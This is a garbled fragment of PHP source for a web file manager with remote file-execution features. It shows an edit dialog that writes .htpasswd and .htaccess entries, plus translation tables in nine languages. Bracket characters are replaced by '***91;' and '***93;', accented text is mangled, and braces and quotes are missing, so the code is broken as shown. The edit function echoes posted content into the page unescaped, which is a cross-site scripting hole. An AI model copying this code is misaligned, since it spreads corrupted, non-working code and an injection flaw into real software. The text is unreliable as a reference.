<select name="create_type" size="1" onfocus="activate(\'create\')">
<option value="file">' . word('file') . '</option>
<option value="directory">' . word('directory') . '</option>
<input type="text" name="create_name" onfocus="activate(\'create\')" />
<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
function edit ($file) {
global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
<form action="' . $self . '" method="post">
<table class="dialog">
<td class="dialog">
<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
if (array_key_exists('content', $_POST)) {
echo $_POST***91;'content'***93;;
} else {
$f = fopen($file, 'r');
while (!feof($f)) {
echo html(fread($f, 8192));
if (!empty($_POST***91;'user'***93;)) {
echo "\n" . $_POST***91;'user'***93; . ':' . crypt($_POST***91;'password'***93;);
if (!empty($_POST***91;'basic_auth'***93;)) {
if ($win) {
$authfile = str_replace('\\', '/', $directory) . $htpasswd;
} else {
$authfile = $directory . $htpasswd;
echo "\nAuthType Basic\nAuthName "Restricted Directory"\n";
echo 'AuthUserFile "' . html($authfile) . ""\n";
echo 'Require valid-user';
echo '</textarea>
<hr />
if ($apache && basename($file) == $htpasswd) {
echo '
' . word('user') . ': <input type="text" name="user" />
' . word('password') . ': <input type="password" name="password" />
<input type="submit" value="' . word('add') . '" />
<hr />
if ($apache && basename($file) == $htaccess) {
echo '
<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
<hr />
echo '
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<input type="reset" value="' . word('reset') . '" id="red_button" />
<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">***91; ' . word('back') . ' ***93;</a></p>
function spacer () {
global $cols;
echo '<tr>
<td colspan="' . $cols . '" style="height: 1em"></td>
function textfieldsize ($content) {
$size = strlen($content) + 5;
if ($size < 30) $size = 30;
return $size;
function request_dump () {
foreach ($_REQUEST as $key => $value) {
echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
/* ------------------------------------------------------------------------- */
function html ($string) {
global $site_charset;
return htmlentities($string, ENT_COMPAT, $site_charset);
function word ($word) {
global $words, $word_charset;
return htmlentities($words***91;$word***93;, ENT_COMPAT, $word_charset);
function phrase ($phrase, $arguments) {
global $words;
static $search;
if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search***91;***93; = "%$i";
for ($i = 0; $i < sizeof($arguments); $i++) {
$arguments***91;$i***93; = nl2br(html($arguments***91;$i***93;));
$replace = array('{' => '<pre>', '}' =>'</pre>', '***91;' => '<b>', '***93;' => '</b>');
return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words***91;$phrase***93;))));
function getwords ($lang) {
global $word_charset, $date_format;
switch ($lang) {
case 'de':
$date_format = 'd.m.y H:i:s';
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Verzeichnis',
'file' => 'Datei',
'filename' => 'Dateiname',
'size' => 'Gr***1616;***1603;e',
'permission' => 'Rechte',
'owner' => 'Eigner',
'group' => 'Gruppe',
'other' => 'Andere',
'functions' => 'Funktionen',
'read' => 'lesen',
'write' => 'schreiben',
'execute' => 'ausf***252;hren',
'create_symlink' => 'Symlink erstellen',
'delete' => 'l***1616;schen',
'rename' => 'umbenennen',
'move' => 'verschieben',
'copy' => 'kopieren',
'edit' => 'editieren',
'download' => 'herunterladen',
'upload' => 'hochladen',
'create' => 'erstellen',
'change' => 'wechseln',
'save' => 'speichern',
'set' => 'setze',
'reset' => 'zur***252;cksetzen',
'relative' => 'Pfad zum Ziel relativ',
'yes' => 'Ja',
'no' => 'Nein',
'back' => 'zur***252;ck',
'destination' => 'Ziel',
'symlink' => 'Symbolischer Link',
'no_output' => 'keine Ausgabe',
'user' => 'Benutzername',
'password' => 'Kennwort',
'add' => 'hinzuf***252;gen',
'add_basic_auth' => 'HTTP-Basic-Auth hinzuf***252;gen',
'uploaded' => '"***91;%1***93;" wurde hochgeladen.',
'not_uploaded' => '"***91;%1***93;" konnte nicht hochgeladen werden.',
'already_exists' => '"***91;%1***93;" existiert bereits.',
'created' => '"***91;%1***93;" wurde erstellt.',
'not_created' => '"***91;%1***93;" konnte nicht erstellt werden.',
'really_delete' => 'Sollen folgende Dateien wirklich gel***1616;scht werden?',
'deleted' => "Folgende Dateien wurden gel***1616;scht:\n***91;%1***93;",
'not_deleted' => "Folgende Dateien konnten nicht gel***1616;scht werden:\n***91;%1***93;",
'rename_file' => 'Benenne Datei um:',
'renamed' => '"***91;%1***93;" wurde in "***91;%2***93;" umbenannt.',
'not_renamed' => '"***91;%1***93; konnte nicht in "***91;%2***93;" umbenannt werden.',
'move_files' => 'Verschieben folgende Dateien:',
'moved' => "Folgende Dateien wurden nach \"***91;%2***93;\" verschoben:\n***91;%1***93;",
'not_moved' => "Folgende Dateien konnten nicht nach \"***91;%2***93;\" verschoben werden:\n***91;%1***93;",
'copy_files' => 'Kopiere folgende Dateien:',
'copied' => "Folgende Dateien wurden nach \"***91;%2***93;\" kopiert:\n***91;%1***93;",
'not_copied' => "Folgende Dateien konnten nicht nach \"***91;%2***93;\" kopiert werden:\n***91;%1***93;",
'not_edited' => '"***91;%1***93;" kann nicht editiert werden.',
'executed' => "\"***91;%1***93;\" wurde erfolgreich ausgef***252;hrt:\n{%2}",
'not_executed' => "\"***91;%1***93;\" konnte nicht erfolgreich ausgef***252;hrt werden:\n{%2}",
'saved' => '"***91;%1***93;" wurde gespeichert.',
'not_saved' => '"***91;%1***93;" konnte nicht gespeichert werden.',
'symlinked' => 'Symbolischer Link von "***91;%2***93;" nach "***91;%1***93;" wurde erstellt.',
'not_symlinked' => 'Symbolischer Link von "***91;%2***93;" nach "***91;%1***93;" konnte nicht erstellt werden.',
'permission_for' => 'Rechte f***252;r "***91;%1***93;":',
'permission_set' => 'Die Rechte f***252;r "***91;%1***93;" wurden auf ***91;%2***93; gesetzt.',
'permission_not_set' => 'Die Rechte f***252;r "***91;%1***93;" konnten nicht auf ***91;%2***93; gesetzt werden.',
'not_readable' => '"***91;%1***93;" kann nicht gelesen werden.'
case 'fr':
$date_format = 'd.m.y H:i:s';
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'R***233;pertoire',
'file' => 'Fichier',
'filename' => 'Nom fichier',
'size' => 'Taille',
'permission' => 'Droits',
'owner' => 'Propri***233;taire',
'group' => 'Groupe',
'other' => 'Autres',
'functions' => 'Fonctions',
'read' => 'Lire',
'write' => 'Ecrire',
'execute' => 'Ex***233;cuter',
'create_symlink' => 'Cr***233;er lien symbolique',
'delete' => 'Effacer',
'rename' => 'Renommer',
'move' => 'D***233;placer',
'copy' => 'Copier',
'edit' => 'Ouvrir',
'download' => 'T***233;l***233;charger sur PC',
'upload' => 'T***233;l***233;charger sur serveur',
'create' => 'Cr***233;er',
'change' => 'Changer',
'save' => 'Sauvegarder',
'set' => 'Ex***233;cuter',
'reset' => 'R***233;initialiser',
'relative' => 'Relatif',
'yes' => 'Oui',
'no' => 'Non',
'back' => 'Retour',
'destination' => 'Destination',
'symlink' => 'Lien symbollique',
'no_output' => 'Pas de sortie',
'user' => 'Utilisateur',
'password' => 'Mot de passe',
'add' => 'Ajouter',
'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"***91;%1***93;" a ***233;t***233; t***233;l***233;charg***233; sur le serveur.',
'not_uploaded' => '"***91;%1***93;" n a pas ***233;t***233; t***233;l***233;charg***233; sur le serveur.',
'already_exists' => '"***91;%1***93;" existe d***233;j***224;.',
'created' => '"***91;%1***93;" a ***233;t***233; cr***233;***233;.',
'not_created' => '"***91;%1***93;" n a pas pu ***234;tre cr***233;***233;.',
'really_delete' => 'Effacer le fichier?',
'deleted' => "Ces fichiers ont ***233;t***233; d***233;tuits:\n***91;%1***93;",
'not_deleted' => "Ces fichiers n ont pu ***234;tre d***233;truits:\n***91;%1***93;",
'rename_file' => 'Renomme fichier:',
'renamed' => '"***91;%1***93;" a ***233;t***233; renomm***233; en "***91;%2***93;".',
'not_renamed' => '"***91;%1***93; n a pas pu ***234;tre renomm***233; en "***91;%2***93;".',
'move_files' => 'D***233;placer ces fichiers:',
'moved' => "Ces fichiers ont ***233;t***233; d***233;plac***233;s en \"***91;%2***93;\":\n***91;%1***93;",
'not_moved' => "Ces fichiers n ont pas pu ***234;tre d***233;plac***233;s en \"***91;%2***93;\":\n***91;%1***93;",
'copy_files' => 'Copier ces fichiers:',
'copied' => "Ces fichiers ont ***233;t***233; copi***233;s en \"***91;%2***93;\":\n***91;%1***93;",
'not_copied' => "Ces fichiers n ont pas pu ***234;tre copi***233;s en \"***91;%2***93;\":\n***91;%1***93;",
'not_edited' => '"***91;%1***93;" ne peut ***234;tre ouvert.',
'executed' => "\"***91;%1***93;\" a ***233;t***233; brillamment ex***233;cut***233; :\n{%2}",
'not_executed' => "\"***91;%1***93;\" n a pas pu ***234;tre ex***233;cut***233;:\n{%2}",
'saved' => '"***91;%1***93;" a ***233;t***233; sauvegard***233;.',
'not_saved' => '"***91;%1***93;" n a pas pu ***234;tre sauvegard***233;.',
'symlinked' => 'Un lien symbolique depuis "***91;%2***93;" vers "***91;%1***93;" a ***233;t***233; cr***233;e.',
'not_symlinked' => 'Un lien symbolique depuis "***91;%2***93;" vers "***91;%1***93;" n a pas pu ***234;tre cr***233;***233;.',
'permission_for' => 'Droits de "***91;%1***93;":',
'permission_set' => 'Droits de "***91;%1***93;" ont ***233;t***233; chang***233;s en ***91;%2***93;.',
'permission_not_set' => 'Droits de "***91;%1***93;" n ont pas pu ***234;tre chang***233;s en***91;%2***93;.',
'not_readable' => '"***91;%1***93;" ne peut pas ***234;tre ouvert.'
case 'it':
$date_format = 'd-m-Y H:i:s';
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Directory',
'file' => 'File',
'filename' => 'Nome File',
'size' => 'Dimensioni',
'permission' => 'Permessi',
'owner' => 'Proprietario',
'group' => 'Gruppo',
'other' => 'Altro',
'functions' => 'Funzioni',
'read' => 'leggi',
'write' => 'scrivi',
'execute' => 'esegui',
'create_symlink' => 'crea link simbolico',
'delete' => 'cancella',
'rename' => 'rinomina',
'move' => 'sposta',
'copy' => 'copia',
'edit' => 'modifica',
'download' => 'download',
'upload' => 'upload',
'create' => 'crea',
'change' => 'cambia',
'save' => 'salva',
'set' => 'imposta',
'reset' => 'reimposta',
'relative' => 'Percorso relativo per la destinazione',
'yes' => 'Si',
'no' => 'No',
'back' => 'indietro',
'destination' => 'Destinazione',
'symlink' => 'Link simbolico',
'no_output' => 'no output',
'user' => 'User',
'password' => 'Password',
'add' => 'aggiungi',
'add_basic_auth' => 'aggiungi autenticazione base',
'uploaded' => '"***91;%1***93;" ***232; stato caricato.',
'not_uploaded' => '"***91;%1***93;" non ***232; stato caricato.',
'already_exists' => '"***91;%1***93;" esiste gi***224;.',
'created' => '"***91;%1***93;" ***232; stato creato.',
'not_created' => '"***91;%1***93;" non ***232; stato creato.',
'really_delete' => 'Cancello questi file ?',
'deleted' => "Questi file sono stati cancellati:\n***91;%1***93;",
'not_deleted' => "Questi file non possono essere cancellati:\n***91;%1***93;",
'rename_file' => 'File rinominato:',
'renamed' => '"***91;%1***93;" ***232; stato rinominato in "***91;%2***93;".',
'not_renamed' => '"***91;%1***93; non ***232; stato rinominato in "***91;%2***93;".',
'move_files' => 'Sposto questi file:',
'moved' => "Questi file sono stati spostati in \"***91;%2***93;\":\n***91;%1***93;",
'not_moved' => "Questi file non possono essere spostati in \"***91;%2***93;\":\n***91;%1***93;",
'copy_files' => 'Copio questi file',
'copied' => "Questi file sono stati copiati in \"***91;%2***93;\":\n***91;%1***93;",
'not_copied' => "Questi file non possono essere copiati in \"***91;%2***93;\":\n***91;%1***93;",
'not_edited' => '"***91;%1***93;" non pu***1613; essere modificato.',
'executed' => "\"***91;%1***93;\" ***232; stato eseguito con successo:\n{%2}",
'not_executed' => "\"***91;%1***93;\" non ***232; stato eseguito con successo\n{%2}",
'saved' => '"***91;%1***93;" ***232; stato salvato.',
'not_saved' => '"***91;%1***93;" non ***232; stato salvato.',
'symlinked' => 'Il link siambolico da "***91;%2***93;" a "***91;%1***93;" ***232; stato creato.',
'not_symlinked' => 'Il link siambolico da "***91;%2***93;" a "***91;%1***93;" non ***232; stato creato.',
'permission_for' => 'Permessi di "***91;%1***93;":',
'permission_set' => 'I permessi di "***91;%1***93;" sono stati impostati ***91;%2***93;.',
'permission_not_set' => 'I permessi di "***91;%1***93;" non sono stati impostati ***91;%2***93;.',
'not_readable' => '"***91;%1***93;" non pu***1613; essere letto.'
case 'nl':
$date_format = 'n/j/y H:i:s';
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Directory',
'file' => 'Bestand',
'filename' => 'Bestandsnaam',
'size' => 'Grootte',
'permission' => 'Bevoegdheid',
'owner' => 'Eigenaar',
'group' => 'Groep',
'other' => 'Anderen',
'functions' => 'Functies',
'read' => 'lezen',
'write' => 'schrijven',
'execute' => 'uitvoeren',
'create_symlink' => 'maak symlink',
'delete' => 'verwijderen',
'rename' => 'hernoemen',
'move' => 'verplaatsen',
'copy' => 'kopieren',
'edit' => 'bewerken',
'download' => 'downloaden',
'upload' => 'uploaden',
'create' => 'aanmaken',
'change' => 'veranderen',
'save' => 'opslaan',
'set' => 'instellen',
'reset' => 'resetten',
'relative' => 'Relatief pat naar doel',
'yes' => 'Ja',
'no' => 'Nee',
'back' => 'terug',
'destination' => 'Bestemming',
'symlink' => 'Symlink',
'no_output' => 'geen output',
'user' => 'Gebruiker',
'password' => 'Wachtwoord',
'add' => 'toevoegen',
'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"***91;%1***93;" is verstuurd.',
'not_uploaded' => '"***91;%1***93;" kan niet worden verstuurd.',
'already_exists' => '"***91;%1***93;" bestaat al.',
'created' => '"***91;%1***93;" is aangemaakt.',
'not_created' => '"***91;%1***93;" kan niet worden aangemaakt.',
'really_delete' => 'Deze bestanden verwijderen?',
'deleted' => "Deze bestanden zijn verwijderd:\n***91;%1***93;",
'not_deleted' => "Deze bestanden konden niet worden verwijderd:\n***91;%1***93;",
'rename_file' => 'Bestandsnaam veranderen:',
'renamed' => '"***91;%1***93;" heet nu "***91;%2***93;".',
'not_renamed' => '"***91;%1***93; kon niet worden veranderd in "***91;%2***93;".',
'move_files' => 'Verplaats deze bestanden:',
'moved' => "Deze bestanden zijn verplaatst naar \"***91;%2***93;\":\n***91;%1***93;",
'not_moved' => "Kan deze bestanden niet verplaatsen naar \"***91;%2***93;\":\n***91;%1***93;",
'copy_files' => 'Kopieer deze bestanden:',
'copied' => "Deze bestanden zijn gekopieerd naar \"***91;%2***93;\":\n***91;%1***93;",
'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"***91;%2***93;\":\n***91;%1***93;",
'not_edited' => '"***91;%1***93;" kan niet worden bewerkt.',
'executed' => "\"***91;%1***93;\" is met succes uitgevoerd:\n{%2}",
'not_executed' => "\"***91;%1***93;\" is niet goed uitgevoerd:\n{%2}",
'saved' => '"***91;%1***93;" is opgeslagen.',
'not_saved' => '"***91;%1***93;" is niet opgeslagen.',
'symlinked' => 'Symlink van "***91;%2***93;" naar "***91;%1***93;" is aangemaakt.',
'not_symlinked' => 'Symlink van "***91;%2***93;" naar "***91;%1***93;" is niet aangemaakt.',
'permission_for' => 'Bevoegdheid voor "***91;%1***93;":',
'permission_set' => 'Bevoegdheid van "***91;%1***93;" is ingesteld op ***91;%2***93;.',
'permission_not_set' => 'Bevoegdheid van "***91;%1***93;" is niet ingesteld op ***91;%2***93;.',
'not_readable' => '"***91;%1***93;" kan niet worden gelezen.'
case 'se':
$date_format = 'n/j/y H:i:s';
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Mapp',
'file' => 'Fil',
'filename' => 'Filnamn',
'size' => 'Storlek',
'permission' => 'S***1606;kerhetsniv***1607;',
'owner' => '***1572;gare',
'group' => 'Grupp',
'other' => 'Andra',
'functions' => 'Funktioner',
'read' => 'L***1606;s',
'write' => 'Skriv',
'execute' => 'Utf***1616;r',
'create_symlink' => 'Skapa symlink',
'delete' => 'Radera',
'rename' => 'Byt namn',
'move' => 'Flytta',
'copy' => 'Kopiera',
'edit' => '***1572;ndra',
'download' => 'Ladda ner',
'upload' => 'Ladda upp',
'create' => 'Skapa',
'change' => '***1572;ndra',
'save' => 'Spara',
'set' => 'Markera',
'reset' => 'T***1616;m',
'relative' => 'Relative path to target',
'yes' => 'Ja',
'no' => 'Nej',
'back' => 'Tillbaks',
'destination' => 'Destination',
'symlink' => 'Symlink',
'no_output' => 'no output',
'user' => 'Anv***1606;ndare',
'password' => 'L***1616;senord',
'add' => 'L***1606;gg till',
'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"***91;%1***93;" har laddats upp.',
'not_uploaded' => '"***91;%1***93;" kunde inte laddas upp.',
'already_exists' => '"***91;%1***93;" finns redan.',
'created' => '"***91;%1***93;" har skapats.',
'not_created' => '"***91;%1***93;" kunde inte skapas.',
'really_delete' => 'Radera dessa filer?',
'deleted' => "De h***1606;r filerna har raderats:\n***91;%1***93;",
'not_deleted' => "Dessa filer kunde inte raderas:\n***91;%1***93;",
'rename_file' => 'Byt namn p***1607; fil:',
'renamed' => '"***91;%1***93;" har bytt namn till "***91;%2***93;".',
'not_renamed' => '"***91;%1***93; kunde inte d***1616;pas om till "***91;%2***93;".',
'move_files' => 'Flytta dessa filer:',
'moved' => "Dessa filer har flyttats till \"***91;%2***93;\":\n***91;%1***93;",
'not_moved' => "Dessa filer kunde inte flyttas till \"***91;%2***93;\":\n***91;%1***93;",
'copy_files' => 'Kopiera dessa filer:',
'copied' => "Dessa filer har kopierats till \"***91;%2***93;\":\n***91;%1***93;",
'not_copied' => "Dessa filer kunde inte kopieras till \"***91;%2***93;\":\n***91;%1***93;",
'not_edited' => '"***91;%1***93;" kan inte ***1606;ndras.',
'executed' => "\"***91;%1***93;\" har utf***1616;rts:\n{%2}",
'not_executed' => "\"***91;%1***93;\" kunde inte utf***1616;ras:\n{%2}",
'saved' => '"***91;%1***93;" har sparats.',
'not_saved' => '"***91;%1***93;" kunde inte sparas.',
'symlinked' => 'Symlink fr***1607;n "***91;%2***93;" till "***91;%1***93;" har skapats.',
'not_symlinked' => 'Symlink fr***1607;n "***91;%2***93;" till "***91;%1***93;" kunde inte skapas.',
'permission_for' => 'R***1606;ttigheter f***1616;r "***91;%1***93;":',
'permission_set' => 'R***1606;ttigheter f***1616;r "***91;%1***93;" ***1606;ndrades till ***91;%2***93;.',
'permission_not_set' => 'Permission of "***91;%1***93;" could not be set to ***91;%2***93;.',
'not_readable' => '"***91;%1***93;" kan inte l***1606;sas.'
case 'sp':
$date_format = 'j/n/y H:i:s';
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Directorio',
'file' => 'Archivo',
'filename' => 'Nombre Archivo',
'size' => 'Tama***1612;o',
'permission' => 'Permisos',
'owner' => 'Propietario',
'group' => 'Grupo',
'other' => 'Otros',
'functions' => 'Funciones',
'read' => 'lectura',
'write' => 'escritura',
'execute' => 'ejecuci***1614;n',
'create_symlink' => 'crear enlace',
'delete' => 'borrar',
'rename' => 'renombrar',
'move' => 'mover',
'copy' => 'copiar',
'edit' => 'editar',
'download' => 'bajar',
'upload' => 'subir',
'create' => 'crear',
'change' => 'cambiar',
'save' => 'salvar',
'set' => 'setear',
'reset' => 'resetear',
'relative' => 'Path relativo',
'yes' => 'Si',
'no' => 'No',
'back' => 'atr***1604;s',
'destination' => 'Destino',
'symlink' => 'Enlace',
'no_output' => 'sin salida',
'user' => 'Usuario',
'password' => 'Clave',
'add' => 'agregar',
'add_basic_auth' => 'agregar autentificaci***1614;n b***1604;sica',
'uploaded' => '"***91;%1***93;" ha sido subido.',
'not_uploaded' => '"***91;%1***93;" no pudo ser subido.',
'already_exists' => '"***91;%1***93;" ya existe.',
'created' => '"***91;%1***93;" ha sido creado.',
'not_created' => '"***91;%1***93;" no pudo ser creado.',
'really_delete' => '***1567;Borra estos archivos?',
'deleted' => "Estos archivos han sido borrados:\n***91;%1***93;",
'not_deleted' => "Estos archivos no pudieron ser borrados:\n***91;%1***93;",
'rename_file' => 'Renombra archivo:',
'renamed' => '"***91;%1***93;" ha sido renombrado a "***91;%2***93;".',
'not_renamed' => '"***91;%1***93; no pudo ser renombrado a "***91;%2***93;".',
'move_files' => 'Mover estos archivos:',
'moved' => "Estos archivos han sido movidos a \"***91;%2***93;\":\n***91;%1***93;",
'not_moved' => "Estos archivos no pudieron ser movidos a \"***91;%2***93;\":\n***91;%1***93;",
'copy_files' => 'Copiar estos archivos:',
'copied' => "Estos archivos han sido copiados a \"***91;%2***93;\":\n***91;%1***93;",
'not_copied' => "Estos archivos no pudieron ser copiados \"***91;%2***93;\":\n***91;%1***93;",
'not_edited' => '"***91;%1***93;" no pudo ser editado.',
'executed' => "\"***91;%1***93;\" ha sido ejecutado correctamente:\n{%2}",
'not_executed' => "\"***91;%1***93;\" no pudo ser ejecutado correctamente:\n{%2}",
'saved' => '"***91;%1***93;" ha sido salvado.',
'not_saved' => '"***91;%1***93;" no pudo ser salvado.',
'symlinked' => 'Enlace desde "***91;%2***93;" a "***91;%1***93;" ha sido creado.',
'not_symlinked' => 'Enlace desde "***91;%2***93;" a "***91;%1***93;" no pudo ser creado.',
'permission_for' => 'Permisos de "***91;%1***93;":',
'permission_set' => 'Permisos de "***91;%1***93;" fueron seteados a ***91;%2***93;.',
'permission_not_set' => 'Permisos de "***91;%1***93;" no pudo ser seteado a ***91;%2***93;.',
'not_readable' => '"***91;%1***93;" no pudo ser le***1610;do.'
case 'dk':
$date_format = 'n/j/y H:i:s';
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Mappe',
'file' => 'Fil',
'filename' => 'Filnavn',
'size' => 'St***1617;rrelse',
'permission' => 'Rettighed',
'owner' => 'Ejer',
'group' => 'Gruppe',
'other' => 'Andre',
'functions' => 'Funktioner',
'read' => 'l***1608;s',
'write' => 'skriv',
'execute' => 'k***1617;r',
'create_symlink' => 'opret symbolsk link',
'delete' => 'slet',
'rename' => 'omd***1617;b',
'move' => 'flyt',
'copy' => 'kopier',
'edit' => 'rediger',
'download' => 'download',
'upload' => 'upload',
'create' => 'opret',
'change' => 'skift',
'save' => 'gem',
'set' => 's***1608;t',
'reset' => 'nulstil',
'relative' => 'Relativ sti til valg',
'yes' => 'Ja',
'no' => 'Nej',
'back' => 'tilbage',
'destination' => 'Distination',
'symlink' => 'Symbolsk link',
'no_output' => 'ingen resultat',
'user' => 'Bruger',
'password' => 'Kodeord',
'add' => 'tilf***1617;j',
'add_basic_auth' => 'tilf***1617;j grundliggende rettigheder',
'uploaded' => '"***91;%1***93;" er blevet uploaded.',
'not_uploaded' => '"***91;%1***93;" kunnu ikke uploades.',
'already_exists' => '"***91;%1***93;" findes allerede.',
'created' => '"***91;%1***93;" er blevet oprettet.',
'not_created' => '"***91;%1***93;" kunne ikke oprettes.',
'really_delete' => 'Slet disse filer?',
'deleted' => "Disse filer er blevet slettet:\n***91;%1***93;",
'not_deleted' => "Disse filer kunne ikke slettes:\n***91;%1***93;",
'rename_file' => 'Omd***1617;d fil:',
'renamed' => '"***91;%1***93;" er blevet omd***1617;bt til "***91;%2***93;".',
'not_renamed' => '"***91;%1***93; kunne ikke omd***1617;bes til "***91;%2***93;".',
'move_files' => 'Flyt disse filer:',
'moved' => "Disse filer er blevet flyttet til \"***91;%2***93;\":\n***91;%1***93;",
'not_moved' => "Disse filer kunne ikke flyttes til \"***91;%2***93;\":\n***91;%1***93;",
'copy_files' => 'Kopier disse filer:',
'copied' => "Disse filer er kopieret til \"***91;%2***93;\":\n***91;%1***93;",
'not_copied' => "Disse filer kunne ikke kopieres til \"***91;%2***93;\":\n***91;%1***93;",
'not_edited' => '"***91;%1***93;" kan ikke redigeres.',
'executed' => "\"***91;%1***93;\" er blevet k***1617;rt korrekt:\n{%2}",
'not_executed' => "\"***91;%1***93;\" kan ikke k***1617;res korrekt:\n{%2}",
'saved' => '"***91;%1***93;" er blevet gemt.',
'not_saved' => '"***91;%1***93;" kunne ikke gemmes.',
'symlinked' => 'Symbolsk link fra "***91;%2***93;" til "***91;%1***93;" er blevet oprettet.',
'not_symlinked' => 'Symbolsk link fra "***91;%2***93;" til "***91;%1***93;" kunne ikke oprettes.',
'permission_for' => 'Rettigheder for "***91;%1***93;":',
'permission_set' => 'Rettigheder for "***91;%1***93;" blev sat til ***91;%2***93;.',
'permission_not_set' => 'Rettigheder for "***91;%1***93;" kunne ikke s***1608;ttes til ***91;%2***93;.',
'not_readable' => '"***91;%1***93;" Kan ikke l***1608;ses.'
case 'tr':
$date_format = 'n/j/y H:i:s';
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Klas***1616;r',
'file' => 'Dosya',
'filename' => 'dosya adi',
'size' => 'boyutu',
'permission' => 'Izin',
'owner' => 'sahib',
'group' => 'Grup',
'other' => 'Digerleri',
'functions' => 'Fonksiyonlar',
'read' => 'oku',
'write' => 'yaz',
'execute' => '***231;alistir',
'create_symlink' => 'yarat symlink',
'delete' => 'sil',
'rename' => 'ad degistir',
'move' => 'tasi',
'copy' => 'kopyala',
'edit' => 'd***252;zenle',
'download' => 'indir',
'upload' => 'y***252;kle',
'create' => 'create',
'change' => 'degistir',
'save' => 'kaydet',
'set' => 'ayar',
'reset' => 'sifirla',
'relative' => 'Hedef yola g***1616;re',
'yes' => 'Evet',
'no' => 'Hayir',
'back' => 'Geri',
'destination' => 'Hedef',
'symlink' => 'K***8206;sa yol',
'no_output' => '***231;ikti yok',
'user' => 'Kullanici',
'password' => 'Sifre',
'add' => 'ekle',
'add_basic_auth' => 'ekle basit-authentification',
'uploaded' => '"***91;%1***93;" y***252;klendi.',
'not_uploaded' => '"***91;%1***93;" y***252;klenemedi.',
'already_exists' => '"***91;%1***93;" kullanilmakta.',
'created' => '"***91;%1***93;" olusturuldu.',
'not_created' => '"***91;%1***93;" olusturulamadi.',
'really_delete' => 'Bu dosyalari silmek istediginizden eminmisiniz?',
'deleted' => "Bu dosyalar silindi:\n***91;%1***93;",
'not_deleted' => "Bu dosyalar silinemedi:\n***91;%1***93;",
'rename_file' => 'Adi degisen dosya:',
'renamed' => '"***91;%1***93;" adili dosyanin yeni adi "***91;%2***93;".',
'not_renamed' => '"***91;%1***93; adi degistirilemedi "***91;%2***93;" ile.',
'move_files' => 'Tasinan dosyalar:',
'moved' => "Bu dosyalari tasidiginiz yer \"***91;%2***93;\":\n***91;%1***93;",
'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"***91;%2***93;\":\n***91;%1***93;",
'copy_files' => 'Kopyalanan dosyalar:',
'copied' => "Bu dosyalar kopyalandi \"***91;%2***93;\":\n***91;%1***93;",
'not_copied' => "Bu dosyalar kopyalanamiyor \"***91;%2***93;\":\n***91;%1***93;",
'not_edited' => '"***91;%1***93;" d***252;zenlenemiyor.',
'executed' => "\"***91;%1***93;\" basariyla ***231;alistirildi:\n{%2}",
'not_executed' => "\"***91;%1***93;\" ***231;alistirilamadi:\n{%2}",
'saved' => '"***91;%1***93;" kaydedildi.',
'not_saved' => '"***91;%1***93;" kaydedilemedi.',
'symlinked' => '"***91;%2***93;" den "***91;%1***93;" e k***8206;sayol olu***8207;turuldu.',
'not_symlinked' => '"***91;%2***93;"den "***91;%1***93;" e k***8206;sayol olu***8207;turulamad***8206;.',
'permission_for' => 'Izinler "***91;%1***93;":',
'permission_set' => 'Izinler "***91;%1***93;" degistirildi ***91;%2***93;.',
'permission_not_set' => 'Izinler "***91;%1***93;" degistirilemedi ***91;%2***93;.',
'not_readable' => '"***91;%1***93;" okunamiyor.'
case 'cs':
$date_format = 'd.m.y H:i:s';
$word_charset = 'UTF-8';
return array(
'directory' => 'Adres***1571;***1548;***1573;\99',
'file' => 'Soubor',
'filename' => 'Jm***1571;\A9no souboru',
'size' => 'Velikost',
'permission' => 'Pr***1571;***1548;va',
'owner' => 'Vlastn***1571;\ADk',
'group' => 'Skupina',
'other' => 'Ostatn***1571;\AD',
'functions' => 'Funkce',
'read' => '***1572;***338;ten***1571;\AD',
'write' => 'Z***1571;***1548;pis',
'execute' => 'Spou***1573;***1548;t***1572;\9Bn***1571;\AD',
'create_symlink' => 'Vytvo***1573;\99it symbolick***1571;***189; odkaz',
'delete' => 'Smazat',
'rename' => 'P***1573;\99ejmenovat',
'move' => 'P***1573;\99esunout',
'copy' => 'Zkop***1571;\ADrovat',
'edit' => 'Otev***1573;\99***1571;\ADt',
'download' => 'St***1571;***1548;hnout',
'upload' => 'Nahraj na server',
'create' => 'Vytvo***1573;\99it',
'change' => 'Zm***1572;\9Bnit',
'save' => 'Ulo***1573;***190;it',
'set' => 'Nastavit',
'reset' => 'zp***1572;\9Bt',
'relative' => 'Relatif',
'yes' => 'Ano',
'no' => 'Ne',
'back' => 'Zp***1572;\9Bt',
'destination' => 'Destination',
'symlink' => 'Symbolick***1571;***189; odkaz',
'no_output' => 'Pr***1571;***1548;zdn***1571;***189; v***1571;***189;stup',
'user' => 'U***1573;***190;ivatel',
'password' => 'Heslo',
'add' => 'P***1573;\99idat',
'add_basic_auth' => 'p***1573;\99idej z***1571;***1548;kladn***1571;\AD autentizaci',
'uploaded' => 'Soubor "***91;%1***93;" byl nahr***1571;***1548;n na server.',
'not_uploaded' => 'Soubor "***91;%1***93;" nebyl nahr***1571;***1548;n na server.',
'already_exists' => 'Soubor "***91;%1***93;" u***1573;***190; exituje.',
